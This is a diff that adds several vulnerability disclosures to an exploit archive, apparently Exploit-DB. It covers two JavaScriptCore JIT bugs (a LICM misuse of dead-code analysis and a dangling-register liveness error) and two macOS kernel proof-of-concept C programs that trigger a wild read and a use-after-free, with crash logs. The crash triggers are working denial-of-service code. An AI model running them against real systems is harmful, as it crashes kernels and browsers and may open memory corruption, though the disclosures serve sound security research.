+     rax = 0x0001414141414141           // Note the additional 0x1 at the start due to the NaN boxing scheme (see JSCJSValue.h)
+
+The same sample also sometimes triggers a crash with --useConcurrentJIT=true (the default), but it is more reliable with concurrent JIT disabled.
+If the sprayed value is a valid pointer, that pointer would either be treated as an object with the structure of `o` in the following code (if the first dword matches the structure ID), or it would be treated as a JSValue after a bailout to the baseline JIT/interpreter.
+
+
+It appears that what is happening here is roughly the following:
+
+When v19 is JIT compiled in the DFG, it emits the following (shortened and simplified) DFG IR for the body of the loop:
+
+    # BASIC BLOCK #9 (loop body)
+     # Create object `o`
+     110:   NewObject()
+     116:   PutByOffset(@110, @113, id1{hax})
+     117:   PutStructure(@110, ID:430)
+
+     # Spread `o` and `arguments` into a new array and use that for a varargs call
+     131:   Spread(@30)
+     134:   NewArrayWithSpread(@110, @131)
+     142:   LoadVarargs(@134, R:World, W:Stack(-26),Stack(-24),Stack(-23),Stack(-22),Heap)
+
+     # Inlined call to v38, load the first argument from the stack (where LoadVarargs put it)
+       8:   GetStack(R:Stack(-24))
+       177:     CheckStructure(@8)
+       178:     PutByOffset(@8, @113, id1{hax})
+       ...
+
+During loop-invariant code motion (LICM), the GetStack operation, reading from the stack slot initialized by the LoadVarargs operation, is moved in front of the loop (together with parts of the inlined v38 function), thus yielding:
+
+    # BASIC BLOCK #2 (before loop header)
+       8:   GetStack(R:Stack(-24))
+       177:     CheckStructure(@8)
+
+
+    # BASIC BLOCK #9 (loop body)
+     # Create object `o`
+      ...
+
+     # Spread `o` and `arguments` into a new array and use that for a varargs call
+     ...
+     142:   LoadVarargs(@134, R:World, W:Stack(-26),Stack(-24),Stack(-23),Stack(-22),Heap)
+     ...
+
+As such, in the resulting machine code, the value for v41 (the argument for the inner function) will be loaded from an uninitialized stack slot (which is only initialized later on in the code).
+
+Normally, this shouldn't happen as the LoadVarargs operations writes into the stack (W:Stack(-24)), and GetStack reads from that (R:Stack(-24)). Quoting from DFGLICMPhase.cpp: "Hoisting is valid if: ... The node doesn't read anything that the loop writes.". As such, GetStack should not have been moved in front of the loop.
+
+The reason that it was still moved appears to be a logical issue in the way LICM deals with dead code: LICM relies on the data computed by control flow analysis (CFA) to know whether a block will be executed at all. If a block will never be executed (and so is dead code), then LICM does not take into account memory writes (e.g. to Stack(-24)) performed by any operation in this block (See https://github.com/WebKit/webkit/blob/c755a5c371370d3a26f2dbfe0eea1b94f2f0c38b/Source/JavaScriptCore/dfg/DFGLICMPhase.cpp#L88). It appears that this behaviour is incorrect, as in this case, CFA correctly concludes that block #9 is dead code (see below). As such, LICM doesn't "see" the memory writes and incorrectly moves the GetStack operation (reading from a stack slot) in front of the LoadVarargs operation (initializing that stack slot).
+
+To understand why CFA computes that the loop body (block #9) is unreachable, it is necessary to take a look at the (simplified) control flow graph for v9, which can be found in the attachment (as it needs to be rendered in monospace font :)). In the CFG, block #3, corresponding to the `if`, is marked as always taking the false branch (which is correct), and thus jumping to block 5. Block 5 then contains a ForceOSRExit operation due to the out-of-bounds array access, which the JIT doesn't optimize for. As this operation terminates execution in the DFG, CFA also stops here and never visits the rest of the loop body and in particular never visits block #9.
+
+
+To recap: in the provided JavaScript program, CFA correctly computes that basic block #9 is never executed. Afterwards, LICM decides, based on that data, to ignore memory writes performed in block #9 (dead code), then moves memory reads from block #9 (dead code) into block #2 (alive code). The code is then unsafe to execute. It is likely that this misbehaviour could lead to other kinds of memory corruption at runtime.
+
+
+             +-----+
+             |  0  +----+
+             +-----+    |
++-----+                 |
+|  1  +-------+         v
++-----+       |     +-----------+
+   ^          |     |    2      |
+   |          +---->| loop head |
+   |                +-----+-----+
+   |                      |
+   |                      v
+   |                 +---------+
+   |                 |    3    |
+   |                 | if head |
+   |                 +--+---+--+
+   |                    |   |
+   |       +-----+      |   |      +-----+
+   |       |  5  |<-----+   +----->|  4  |
+   |       +--+--+                 +--+--+
+   |    OSRExit here                  |
+   |                   +-----+        |
+   |                   |  6  |<-------+
+   |                   +--+--+
+   |       +------+       |
+   +-------+ 7-10 |<------+
+           +---+--+
+       Rest of | Loop body
+               |
+               | To End of function
\ No newline at end of file
diff --git a/exploits/multiple/dos/46890.txt b/exploits/multiple/dos/46890.txt
new file mode 100644
index 000000000..3c1ba3dcb
--- /dev/null
+++ b/exploits/multiple/dos/46890.txt
@@ -0,0 +1,121 @@
+While fuzzing JavaScriptCore, I encountered the following JavaScript program which crashes jsc from current HEAD (git commit 3c46422e45fef2de6ff13b66cd45705d63859555) in debug and release builds (./Tools/Scripts/build-jsc --jsc-only [--debug or --release]):
+
+    // Run with --useConcurrentJIT=false --thresholdForJITAfterWarmUp=10 --thresholdForFTLOptimizeAfterWarmUp=1000
+
+    function v0(v1) {
+        function v7(v8) {
+            function v12(v13, v14) {
+                const v16 = v14 - -0x80000000;
+                const v19 = [13.37, 13.37, 13.37];
+                function v20() {
+                    return v16;
+                }
+                return v19;
+            }
+            return v8(v12, v1);
+        }
+        const v27 = v7(v7);
+    }
+    for (let i = 0; i < 100; i++) {
+        v0(i);
+    }
+
+It appears that what is happening here is roughly the following:
+
+Initially, the call to v12 is inlined and the IR contains (besides others) the following instructions for the inlined v12:
+
+    1 <- GetScope()
+    2 <- CreateActivation(1)
+    3 <- GetLocal(v14)
+    4 <- JSConstant(-0x80000000)
+    5 <- ValueSub(3, 4)
+    6 <- NewArrayBuffer(...)
+
+Here, The CreateActivation instruction allocates a LexicalEnvironment object on the heap to store local variables into. The NewArrayBuffer allocates backing memory for the array.
+Next, the subtraction is (incorrectly?) speculated to not overflow and is thus replaced by an ArithSub, an instruction performing an integer subtraction and bailing out if an overflow occurs:
+
+    1 <- GetScope()
+    2 <- CreateActivation(1)
+    3 <- GetLocal(v14)
+    4 <- JSConstant(-0x80000000)
+    5 <- ArithSub(3, 4)
+    6 <- NewArrayBuffer(...)
+
+Next, the object allocation sinking phase runs, which determines that the created activation object doesn't leave the current scope and thus doesn't have to be allocated at all. It then replaces it with a PhancomCreateActivation, a node indicating that at this point a heap allocation used to happen which would have to be restored ("materialized") during a bailout because the interpreter/baseline JIT expects it to be there. As the scope object is required to materialize the Activation, a PutHint is created which indicates that during a bailout, the result of GetScope must be available somehow.
+
+    1 <- GetScope()
+    2 <- PhantomCreateActivation()
+    7 <- PutHint(2, 1)
+    3 <- GetLocal(v14)
+    4 <- JSConstant(-0x80000000)
+    5 <- ArithSub(3, 4)
+    6 <- NewArrayBuffer(...)
+
+The DFG IR code is then lowered to B3, yielding the following:
+
+    Int64 @66 = Const64(16, DFG:@1)
+    Int64 @67 = Add(@35, $16(@66), DFG:@1)
+    Int64 @68 = Load(@67, ControlDependent|Reads:28, DFG:@1)
+    Int32 @69 = Const32(-2147483648, DFG:@5)
+    Int32 @70 = CheckSub(@48:WarmAny, $-2147483648(@69):WarmAny, @35:ColdAny, @48:ColdAny, @68:ColdAny, @41:ColdAny, ...)
+    Int64 @74 = Patchpoint(..., DFG:@6)
+
+Here, the first three operations fetch the current scope, the next two instruction perform the checked integer subtraction, and the last instruction performs the array storage allocation. Note that the scope object (@68) is an operand for the subtraction as it is required for the materialization of the activation during a bailout. The B3 code is then (after more optimizations) lowered to AIR:
+
+    Move %tmp2, (stack0), @65
+    Move 16(%tmp2), %tmp28, @68
+    Move $-2147483648, %tmp29, $-2147483648(@69)
+    Move %tmp4, %tmp27, @70
+    Patch &BranchSub32(3,SameAsRep)4, Overflow, $-2147483648, %tmp27, %tmp2, %tmp4, %tmp28, %tmp5, @70
+    Patch &Patchpoint2, %tmp24, %tmp25, %tmp26, @74
+
+Then, after optimizations on the AIR code and register allocation:
+
+    Move %rax, (stack0), @65
+    Move 16(%rax), %rdx, @68
+    Patch &BranchSub32(3,SameAsRep)4, Overflow, $-2147483648, %rcx, %rax, %rcx, %rdx, %rsi, @70
+    Patch &Patchpoint2, %rax, %rcx, %rdx, @74
+
+Finally, in the reportUsedRegisters phase (AirReportUsedRegisters.cpp), the following happens
+
+* The register rdx is marked as "lateUse" for the BranchSub32 and as "earlyDef" for the Patchpoint (this might ultimately be the cause of the issue).
+    "early" and "late" refer to the time the operand is used/defined, either before the instruction executes or after.
+* As such, at the boundary (which is where register liveness is computed) between the last two instructions, rdx is both defined and used.
+* Then, when liveness is computed (in AirRegLiveness.cpp) for the boundary between the Move and the BranchSub32, rdx is determined to be dead as it is not used at the boundary and defined at the following boundary:
+
+    // RegLiveness::LocalCalc::execute
+    void execute(unsigned instIndex)
+    {
+        m_workset.exclude(m_actions[instIndex + 1].def);
+        m_workset.merge(m_actions[instIndex].use);
+    }
+
+As a result, the assignment to rdx (storing the pointer to the scope object), is determined to be a store to a dead register and is thus discarded, leaving the following code:
+
+    Move %rax, (stack0), @65
+    Patch &BranchSub32(3,SameAsRep)4, Overflow, $-2147483648, %rcx, %rax, %rcx, %rdx, %rsi, @70
+    Patch &Patchpoint2, %rax, %rcx, %rdx, @74
+
+As such, whatever used to be in rdx will then be treated as a pointer to a scope object during materialization of the activation in the case of a bailout, leading to a crash similar to the following:
+
+    * thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0xbbadbeef)
+      * frame #0: 0x0000000101a88b20 JavaScriptCore`::WTFCrash() at Assertions.cpp:255
+        frame #1: 0x00000001000058fb jsc`WTFCrashWithInfo((null)=521, (null)="../../Source/JavaScriptCore/runtime/JSCJSValueInlines.h", (null)="JSC::JSCell *JSC::JSValue::asCell() const", (null)=1229) at Assertions.h:560
+        frame #2: 0x000000010000bdbb jsc`JSC::JSValue::asCell(this=0x00007ffeefbfcf78) const at JSCJSValueInlines.h:521
+        frame #3: 0x0000000100fe5fbd JavaScriptCore`::operationMaterializeObjectInOSR(exec=0x00007ffeefbfd230, materialization=0x0000000106350f00, values=0x00000001088e7448) at FTLOperations.cpp:217
+        frame #4: ...
+
+    (lldb) up 2
+    frame #2: 0x000000010000bdbb jsc`JSC::JSValue::asCell(this=0x00007ffeefbfcf78) const at JSCJSValueInlines.h:521
+    (lldb) p *this
+    (JSC::JSValue) $2 = {
+      u = {
+        asInt64 = -281474976710656
+        ptr = 0xffff000000000000
+        asBits = (payload = 0, tag = -65536)
+      }
+    }
+
+In this execution, the register rdx contained the value 0xffff000000000000, used in the JITed code as a mask to e.g. quickly determine whether a value is an integer. However, depending on the compiled code, the register could store different (and potentially attacker controlled) data. Moreover, it might be possible to trigger the same misbehaviour in other situations in which the dangling register is expected to hold some other value.
+
+This particular sample seems to require the ValueSub DFG instruction, introduced in git commit  5ea7781f2acb639eddc2ec8041328348bdf72877, to produce this type of AIR code. However, it is possible that other DFG IR operations can result in the same AIR code and thus trigger this issue. I have a few other samples that appear to be triggering the same bug with different thresholds and potentially with concurrent JIT enabled which I can share if that is helpful.
\ No newline at end of file
diff --git a/exploits/multiple/dos/46891.cc b/exploits/multiple/dos/46891.cc
new file mode 100644
index 000000000..91f5e293f
--- /dev/null
+++ b/exploits/multiple/dos/46891.cc
@@ -0,0 +1,152 @@
+/*
+
+# Reproduction
+Tested on macOS 10.14.3:
+$ clang -o stf_wild_read stf_wild_read.cc
+$ ./stf_wild_read
+
+# Explanation
+SIOCSIFADDR is an ioctl that sets the address of an interface.
+The stf interface ioctls are handled by the stf_ioctl function.
+The crash occurs in the following case where a `struct ifreq`
+is read into kernel memory and then casted to the incorrect
+`struct ifaddr` type. I suspect this ioctl is not intended to
+be reachable by the user, but is unintentionally exposed without
+the necessary translation from `ifreq` to `ifaddr`, e.g. as it is
+done in `inctl_ifaddr`.
+
+	case SIOCSIFADDR:
+		ifa = (struct ifaddr *)data;
+		if (ifa == NULL) {
+			error = EAFNOSUPPORT;
+			break;
+		}
+		IFA_LOCK(ifa);
+		if (ifa->ifa_addr->sa_family != AF_INET6) { // <- crash here
+			IFA_UNLOCK(ifa);
+			error = EAFNOSUPPORT;
+			break;
+		}
+
+Note that IFA_LOCK is called on user-provided data; it appears that there
+is an opportunity for memory corruption (a controlled write) when using
+indirect mutexes via LCK_MTX_TAG_INDIRECT (see lck_mtx_lock_slow).
+
+# Crash Log
+panic(cpu 6 caller 0xffffff80112da29d): Kernel trap at 0xffffff80114a2ec8, type 14=page fault, registers:
+CR0: 0x0000000080010033, CR2: 0x0000000000000001, CR3: 0x00000005e4ea1168, CR4: 0x00000000003626e0
+RAX: 0x0000000000000000, RBX: 0x000000000000002f, RCX: 0x0000000002000000, RDX: 0x0000000003000000
+RSP: 0xffffffa3d2a1bb90, RBP: 0xffffffa3d2a1bbb0, RSI: 0xffffffa3d2a1bd10, RDI: 0x0000000000000000
+R8:  0xffffff805f9db7f0, R9:  0x000000000000002d, R10: 0xffffff805e210100, R11: 0x0000000000000000
+R12: 0x0000000000000020, R13: 0xffffff805e20fcb8, R14: 0xffffff805e20fcb8, R15: 0xffffffa3d2a1bd10
+RFL: 0x0000000000010246, RIP: 0xffffff80114a2ec8, CS:  0x0000000000000008, SS:  0x0000000000000010
+Fault CR2: 0x0000000000000001, Error code: 0x0000000000000000, Fault CPU: 0x6, PL: 0, VF: 0
+
+Backtrace (CPU 6), Frame : Return Address
+0xffffffa3d2a1b660 : 0xffffff80111aeb0d mach_kernel : _handle_debugger_trap + 0x48d
+0xffffffa3d2a1b6b0 : 0xffffff80112e8653 mach_kernel : _kdp_i386_trap + 0x153
+0xffffffa3d2a1b6f0 : 0xffffff80112da07a mach_kernel : _kernel_trap + 0x4fa
+0xffffffa3d2a1b760 : 0xffffff801115bca0 mach_kernel : _return_from_trap + 0xe0
+0xffffffa3d2a1b780 : 0xffffff80111ae527 mach_kernel : _panic_trap_to_debugger + 0x197
+0xffffffa3d2a1b8a0 : 0xffffff80111ae373 mach_kernel : _panic + 0x63
+0xffffffa3d2a1b910 : 0xffffff80112da29d mach_kernel : _kernel_trap + 0x71d
+0xffffffa3d2a1ba80 : 0xffffff801115bca0 mach_kernel : _return_from_trap + 0xe0
+0xffffffa3d2a1baa0 : 0xffffff80114a2ec8 mach_kernel : _stfattach + 0x558
+0xffffffa3d2a1bbb0 : 0xffffff80114632b7 mach_kernel : _ifnet_ioctl + 0x217
+0xffffffa3d2a1bc10 : 0xffffff801145bb54 mach_kernel : _ifioctl + 0x2214
+0xffffffa3d2a1bce0 : 0xffffff8011459a54 mach_kernel : _ifioctl + 0x114
+0xffffffa3d2a1bd80 : 0xffffff801145f9cf mach_kernel : _ifioctllocked + 0x2f
+0xffffffa3d2a1bdb0 : 0xffffff80116f5718 mach_kernel : _soo_select + 0x5e8
+0xffffffa3d2a1be00 : 0xffffff80116990ab mach_kernel : _fo_ioctl + 0x7b
+0xffffffa3d2a1be30 : 0xffffff80116eefac mach_kernel : _ioctl + 0x52c
+0xffffffa3d2a1bf40 : 0xffffff80117b62bb mach_kernel : _unix_syscall64 + 0x26b
+0xffffffa3d2a1bfa0 : 0xffffff801115c466 mach_kernel : _hndl_unix_scall64 + 0x16
+*/
+
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/ioctl.h>
+#include <sys/socket.h>
+#include <unistd.h>
+#include <net/if.h>
+#include <string.h>
+
+/*
+# Reproduction
+Tested on macOS 10.14.3:
+$ clang -o stf_wild_read stf_wild_read.cc
+$ ./stf_wild_read
+
+# Explanation
+SIOCSIFADDR is an ioctl that sets the address of an interface.
+The stf interface ioctls are handled by the stf_ioctl function.
+The crash occurs in the following case where a `struct ifreq`
+is read into kernel memory and then casted to the incorrect
+`struct ifaddr` type. I suspect this ioctl is not intended to
+be reachable by the user, but is unintentionally exposed without
+the necessary translation from `ifreq` to `ifaddr`, e.g. as it is
+done in `inctl_ifaddr`.
+
+	case SIOCSIFADDR:
+		ifa = (struct ifaddr *)data;
+		if (ifa == NULL) {
+			error = EAFNOSUPPORT;
+			break;
+		}
+		IFA_LOCK(ifa);
+		if (ifa->ifa_addr->sa_family != AF_INET6) { // <- crash here
+			IFA_UNLOCK(ifa);
+			error = EAFNOSUPPORT;
+			break;
+		}
+
+Note that IFA_LOCK is called on user-provided data; it appears that there
+is an opportunity for memory corruption (a controlled write) when using
+indirect mutexes via LCK_MTX_TAG_INDIRECT (see lck_mtx_lock_slow).
+
+# Crash Log
+panic(cpu 6 caller 0xffffff80112da29d): Kernel trap at 0xffffff80114a2ec8, type 14=page fault, registers:
+CR0: 0x0000000080010033, CR2: 0x0000000000000001, CR3: 0x00000005e4ea1168, CR4: 0x00000000003626e0
+RAX: 0x0000000000000000, RBX: 0x000000000000002f, RCX: 0x0000000002000000, RDX: 0x0000000003000000
+RSP: 0xffffffa3d2a1bb90, RBP: 0xffffffa3d2a1bbb0, RSI: 0xffffffa3d2a1bd10, RDI: 0x0000000000000000
+R8:  0xffffff805f9db7f0, R9:  0x000000000000002d, R10: 0xffffff805e210100, R11: 0x0000000000000000
+R12: 0x0000000000000020, R13: 0xffffff805e20fcb8, R14: 0xffffff805e20fcb8, R15: 0xffffffa3d2a1bd10
+RFL: 0x0000000000010246, RIP: 0xffffff80114a2ec8, CS:  0x0000000000000008, SS:  0x0000000000000010
+Fault CR2: 0x0000000000000001, Error code: 0x0000000000000000, Fault CPU: 0x6, PL: 0, VF: 0
+
+Backtrace (CPU 6), Frame : Return Address
+0xffffffa3d2a1b660 : 0xffffff80111aeb0d mach_kernel : _handle_debugger_trap + 0x48d
+0xffffffa3d2a1b6b0 : 0xffffff80112e8653 mach_kernel : _kdp_i386_trap + 0x153
+0xffffffa3d2a1b6f0 : 0xffffff80112da07a mach_kernel : _kernel_trap + 0x4fa
+0xffffffa3d2a1b760 : 0xffffff801115bca0 mach_kernel : _return_from_trap + 0xe0
+0xffffffa3d2a1b780 : 0xffffff80111ae527 mach_kernel : _panic_trap_to_debugger + 0x197
+0xffffffa3d2a1b8a0 : 0xffffff80111ae373 mach_kernel : _panic + 0x63
+0xffffffa3d2a1b910 : 0xffffff80112da29d mach_kernel : _kernel_trap + 0x71d
+0xffffffa3d2a1ba80 : 0xffffff801115bca0 mach_kernel : _return_from_trap + 0xe0
+0xffffffa3d2a1baa0 : 0xffffff80114a2ec8 mach_kernel : _stfattach + 0x558
+0xffffffa3d2a1bbb0 : 0xffffff80114632b7 mach_kernel : _ifnet_ioctl + 0x217
+0xffffffa3d2a1bc10 : 0xffffff801145bb54 mach_kernel : _ifioctl + 0x2214
+0xffffffa3d2a1bce0 : 0xffffff8011459a54 mach_kernel : _ifioctl + 0x114
+0xffffffa3d2a1bd80 : 0xffffff801145f9cf mach_kernel : _ifioctllocked + 0x2f
+0xffffffa3d2a1bdb0 : 0xffffff80116f5718 mach_kernel : _soo_select + 0x5e8
+0xffffffa3d2a1be00 : 0xffffff80116990ab mach_kernel : _fo_ioctl + 0x7b
+0xffffffa3d2a1be30 : 0xffffff80116eefac mach_kernel : _ioctl + 0x52c
+0xffffffa3d2a1bf40 : 0xffffff80117b62bb mach_kernel : _unix_syscall64 + 0x26b
+0xffffffa3d2a1bfa0 : 0xffffff801115c466 mach_kernel : _hndl_unix_scall64 + 0x16
+*/
+
+#define IPPROTO_IP 0
+
+int main() {
+    int s = socket(AF_SYSTEM, SOCK_DGRAM, IPPROTO_IP);
+    if (s < 0) {
+        printf("failed\n");
+        return 1;
+    }
+    struct ifreq ifr = {};
+    memcpy(ifr.ifr_name, "stf0\0000", 8);
+    int err = ioctl(s, SIOCSIFADDR, (char *)&ifr);
+    close(s);
+    printf("done\n");
+    return 0;
+}
\ No newline at end of file
diff --git a/exploits/multiple/dos/46892.txt b/exploits/multiple/dos/46892.txt
new file mode 100644
index 000000000..54bb2b7b4
--- /dev/null
+++ b/exploits/multiple/dos/46892.txt
@@ -0,0 +1,273 @@
+# Reproduction
+Repros on 10.14.3 when run as root. It may need multiple tries to trigger.
+$ clang -o in6_selectsrc in6_selectsrc.cc
+$ while 1; do sudo ./in6_selectsrc; done
+res0: 3
+res1: 0
+res1.5: -1 // failure expected here
+res2: 0
+done
+...
+[crash]
+
+# Explanation
+The following snippet is taken from in6_pcbdetach:
+```
+void
+in6_pcbdetach(struct inpcb *inp)
+{
+    // ...
+	if (!(so->so_flags & SOF_PCBCLEARING)) {
+		struct ip_moptions *imo;
+		struct ip6_moptions *im6o;
+
+		inp->inp_vflag = 0;
+		if (inp->in6p_options != NULL) {
+			m_freem(inp->in6p_options);
+			inp->in6p_options = NULL; // <- good
+		}
+		ip6_freepcbopts(inp->in6p_outputopts); // <- bad
+		ROUTE_RELEASE(&inp->in6p_route);
+		// free IPv4 related resources in case of mapped addr
+		if (inp->inp_options != NULL) {
+			(void) m_free(inp->inp_options); // <- good
+			inp->inp_options = NULL;
+		}
+```
+
+Notice that freed options must also be cleared so they are not accidentally reused.
+This can happen when a socket is disconnected and reconnected without being destroyed.
+In the inp->in6p_outputopts case, the options are freed but not cleared, so they can be
+used after they are freed.
+
+This specific PoC requires root because I use raw sockets, but it's possible other socket
+types suffer from this same vulnerability.
+
+# Crash Log
+panic(cpu 4 caller 0xffffff8015cda29d): Kernel trap at 0xffffff8016011764, type 13=general protection, registers:
+CR0: 0x0000000080010033, CR2: 0x00007f9ae1801000, CR3: 0x000000069fc5f111, CR4: 0x00000000003626e0
+RAX: 0x0000000000000001, RBX: 0xdeadbeefdeadbeef, RCX: 0x0000000000000000, RDX: 0x0000000000000000
+RSP: 0xffffffa3ffa5bd30, RBP: 0xffffffa3ffa5bdc0, RSI: 0x0000000000000000, RDI: 0x0000000000000001
+R8:  0x0000000000000000, R9:  0xffffffa3ffa5bde0, R10: 0xffffff801664de20, R11: 0x0000000000000000
+R12: 0x0000000000000000, R13: 0xffffff80719b7940, R14: 0xffffff8067fdc660, R15: 0x0000000000000000
+RFL: 0x0000000000010282, RIP: 0xffffff8016011764, CS:  0x0000000000000008, SS:  0x0000000000000010
+Fault CR2: 0x00007f9ae1801000, Error code: 0x0000000000000000, Fault CPU: 0x4, PL: 0, VF: 0
+
+Backtrace (CPU 4), Frame : Return Address
+0xffffff801594e290 : 0xffffff8015baeb0d mach_kernel : _handle_debugger_trap + 0x48d
+0xffffff801594e2e0 : 0xffffff8015ce8653 mach_kernel : _kdp_i386_trap + 0x153
+0xffffff801594e320 : 0xffffff8015cda07a mach_kernel : _kernel_trap + 0x4fa
+0xffffff801594e390 : 0xffffff8015b5bca0 mach_kernel : _return_from_trap + 0xe0
+0xffffff801594e3b0 : 0xffffff8015bae527 mach_kernel : _panic_trap_to_debugger + 0x197
+0xffffff801594e4d0 : 0xffffff8015bae373 mach_kernel : _panic + 0x63
+0xffffff801594e540 : 0xffffff8015cda29d mach_kernel : _kernel_trap + 0x71d
+0xffffff801594e6b0 : 0xffffff8015b5bca0 mach_kernel : _return_from_trap + 0xe0
+0xffffff801594e6d0 : 0xffffff8016011764 mach_kernel : _in6_selectsrc + 0x114
+0xffffffa3ffa5bdc0 : 0xffffff8016043015 mach_kernel : _nd6_setdefaultiface + 0xd75
+0xffffffa3ffa5be20 : 0xffffff8016120274 mach_kernel : _soconnectlock + 0x284
+0xffffffa3ffa5be60 : 0xffffff80161317bf mach_kernel : _connect_nocancel + 0x20f
+0xffffffa3ffa5bf40 : 0xffffff80161b62bb mach_kernel : _unix_syscall64 + 0x26b
+0xffffffa3ffa5bfa0 : 0xffffff8015b5c466 mach_kernel : _hndl_unix_scall64 + 0x16
+
+BSD process name corresponding to current thread: in6_selectsrc
+Boot args: keepsyms=1 -v=1
+
+Mac OS version:
+18D109
+
+
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/ioctl.h>
+#include <sys/socket.h>
+#include <unistd.h>
+#include <net/if.h>
+#include <string.h>
+#include <netinet/in.h>
+#include <errno.h>
+
+/*
+# Reproduction
+Repros on 10.14.3 when run as root. It may need multiple tries to trigger.
+$ clang -o in6_selectsrc in6_selectsrc.cc
+$ while 1; do sudo ./in6_selectsrc; done
+res0: 3
+res1: 0
+res1.5: -1 // failure expected here
+res2: 0
+done
+...
+[crash]
+
+# Explanation
+The following snippet is taken from in6_pcbdetach:
+```
+void
+in6_pcbdetach(struct inpcb *inp)
+{
+    // ...
+	if (!(so->so_flags & SOF_PCBCLEARING)) {
+		struct ip_moptions *imo;
+		struct ip6_moptions *im6o;
+
+		inp->inp_vflag = 0;
+		if (inp->in6p_options != NULL) {
+			m_freem(inp->in6p_options);
+			inp->in6p_options = NULL; // <- good
+		}
+		ip6_freepcbopts(inp->in6p_outputopts); // <- bad
+		ROUTE_RELEASE(&inp->in6p_route);
+		// free IPv4 related resources in case of mapped addr
+		if (inp->inp_options != NULL) {
+			(void) m_free(inp->inp_options); // <- good
+			inp->inp_options = NULL;
+		}
+```
+
+Notice that freed options must also be cleared so they are not accidentally reused.
+This can happen when a socket is disconnected and reconnected without being destroyed.
+In the inp->in6p_outputopts case, the options are freed but not cleared, so they can be
+used after they are freed.
+
+This specific PoC requires root because I use raw sockets, but it's possible other socket
+types suffer from this same vulnerability.
+
+# Crash Log
+panic(cpu 4 caller 0xffffff8015cda29d): Kernel trap at 0xffffff8016011764, type 13=general protection, registers:
+CR0: 0x0000000080010033, CR2: 0x00007f9ae1801000, CR3: 0x000000069fc5f111, CR4: 0x00000000003626e0
+RAX: 0x0000000000000001, RBX: 0xdeadbeefdeadbeef, RCX: 0x0000000000000000, RDX: 0x0000000000000000
+RSP: 0xffffffa3ffa5bd30, RBP: 0xffffffa3ffa5bdc0, RSI: 0x0000000000000000, RDI: 0x0000000000000001
+R8:  0x0000000000000000, R9:  0xffffffa3ffa5bde0, R10: 0xffffff801664de20, R11: 0x0000000000000000
+R12: 0x0000000000000000, R13: 0xffffff80719b7940, R14: 0xffffff8067fdc660, R15: 0x0000000000000000
+RFL: 0x0000000000010282, RIP: 0xffffff8016011764, CS:  0x0000000000000008, SS:  0x0000000000000010
+Fault CR2: 0x00007f9ae1801000, Error code: 0x0000000000000000, Fault CPU: 0x4, PL: 0, VF: 0
+
+Backtrace (CPU 4), Frame : Return Address
+0xffffff801594e290 : 0xffffff8015baeb0d mach_kernel : _handle_debugger_trap + 0x48d
+0xffffff801594e2e0 : 0xffffff8015ce8653 mach_kernel : _kdp_i386_trap + 0x153
+0xffffff801594e320 : 0xffffff8015cda07a mach_kernel : _kernel_trap + 0x4fa
+0xffffff801594e390 : 0xffffff8015b5bca0 mach_kernel : _return_from_trap + 0xe0
+0xffffff801594e3b0 : 0xffffff8015bae527 mach_kernel : _panic_trap_to_debugger + 0x197
+0xffffff801594e4d0 : 0xffffff8015bae373 mach_kernel : _panic + 0x63
+0xffffff801594e540 : 0xffffff8015cda29d mach_kernel : _kernel_trap + 0x71d
+0xffffff801594e6b0 : 0xffffff8015b5bca0 mach_kernel : _return_from_trap + 0xe0
+0xffffff801594e6d0 : 0xffffff8016011764 mach_kernel : _in6_selectsrc + 0x114
+0xffffffa3ffa5bdc0 : 0xffffff8016043015 mach_kernel : _nd6_setdefaultiface + 0xd75
+0xffffffa3ffa5be20 : 0xffffff8016120274 mach_kernel : _soconnectlock + 0x284
+0xffffffa3ffa5be60 : 0xffffff80161317bf mach_kernel : _connect_nocancel + 0x20f
+0xffffffa3ffa5bf40 : 0xffffff80161b62bb mach_kernel : _unix_syscall64 + 0x26b
+0xffffffa3ffa5bfa0 : 0xffffff8015b5c466 mach_kernel : _hndl_unix_scall64 + 0x16
+
+BSD process name corresponding to current thread: in6_selectsrc
+Boot args: keepsyms=1 -v=1
+
+Mac OS version:
+18D109
+*/
+
+#define IPPROTO_IP 0
+
+#define IN6_ADDR_ANY { 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 }
+#define IN6_ADDR_LOOPBACK { 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1 }
+
+int main() {
+    int s = socket(AF_INET6, SOCK_RAW, IPPROTO_IP);
+    printf("res0: %d\n", s);
+    struct sockaddr_in6 sa1 = {
+        .sin6_len = sizeof(struct sockaddr_in6),
+        .sin6_family = AF_INET6,
+        .sin6_port = 65000,
+        .sin6_flowinfo = 3,
+        .sin6_addr = IN6_ADDR_LOOPBACK,
+        .sin6_scope_id = 0,
+    };
+    struct sockaddr_in6 sa2 = {
+        .sin6_len = sizeof(struct sockaddr_in6),
+        .sin6_family = AF_INET6,
+        .sin6_port = 65001,
+        .sin6_flowinfo = 3,
+        .sin6_addr = IN6_ADDR_ANY,
+        .sin6_scope_id = 0,
+    };
+
+    int res = connect(s, (const sockaddr*)&sa1, sizeof(sa1));
+    printf("res1: %d\n", res);
+
+    unsigned char buffer[4] = {};
+    res = setsockopt(s, 41, 50, buffer, sizeof(buffer));
+    printf("res1.5: %d\n", res);
+
+    res = connect(s, (const sockaddr*)&sa2, sizeof(sa2));
+    printf("res2: %d\n", res);
+
+    close(s);
+    printf("done\n");
+}
+
+
+ClusterFuzz found the following crash, which indicates that TCP sockets may be affected as well.
+
+==16571==ERROR: AddressSanitizer: heap-use-after-free on address 0x610000000c50 at pc 0x7f15a39744c0 bp 0x7ffd72521250 sp 0x7ffd72521248
+READ of size 8 at 0x610000000c50 thread T0
+SCARINESS: 51 (8-byte-read-heap-use-after-free)
+    #0 0x7f15a39744bf in ip6_getpcbopt /src/bsd/netinet6/ip6_output.c:3140:25
+    #1 0x7f15a3970cb2 in ip6_ctloutput /src/bsd/netinet6/ip6_output.c:2924:13
+    #2 0x7f15a389e3ac in tcp_ctloutput /src/bsd/netinet/tcp_usrreq.c:1906:12
+    #3 0x7f15a344680c in sogetoptlock /src/bsd/kern/uipc_socket.c:5512:12
+    #4 0x7f15a346ea86 in getsockopt /src/bsd/kern/uipc_syscalls.c:2517:10
+
+0x610000000c50 is located 16 bytes inside of 192-byte region [0x610000000c40,0x610000000d00)
+freed by thread T0 here:
+    #0 0x497a3d in free _asan_rtl_:3
+    #1 0x7f15a392329d in in6_pcbdetach /src/bsd/netinet6/in6_pcb.c:681:3
